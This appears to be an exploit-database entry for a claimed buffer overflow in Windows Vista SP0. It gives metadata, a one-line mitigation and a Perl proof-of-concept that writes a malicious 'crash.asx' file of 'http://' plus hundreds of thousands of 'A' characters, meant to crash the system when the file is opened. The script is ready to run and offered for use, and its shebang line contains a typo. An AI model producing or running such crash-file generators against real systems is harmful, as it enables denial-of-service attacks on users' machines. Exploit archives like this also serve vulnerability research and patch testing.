header-logo
Suggest Exploit
vendor:
Windows Vista
by:
D3V!L FUCKER
9.3
CVSS
HIGH
Buffer Overflow
120
CWE
Product Name: Windows Vista
Affected Version From: Windows Vista SP0
Affected Version To: Windows Vista SP0
Patch Exists: YES
Related CWE: N/A
CPE: o:microsoft:windows_vista::sp0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2020

Buffer Overflow in Windows Vista SP0

This exploit is a buffer overflow vulnerability in Windows Vista SP0. The exploit is written in Perl and creates a file called 'crash.asx' which contains a string of 500000 'A's. When the file is opened, the buffer is overflowed and the system crashes.

Mitigation:

Ensure that all software is up to date and patched with the latest security updates.
Source

Exploit-DB raw data:

#!/user/bin/perl
# Author: [D3V!L FUCKER]
# Tested on: [windows vista sp0]
# Code :
my $file= "crash.asx";

my $boom= "http://"."AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" x 500000;

open($FILE,">>$file");

print $FILE "$boom";

close($FILE);

print "Done..!~#\n";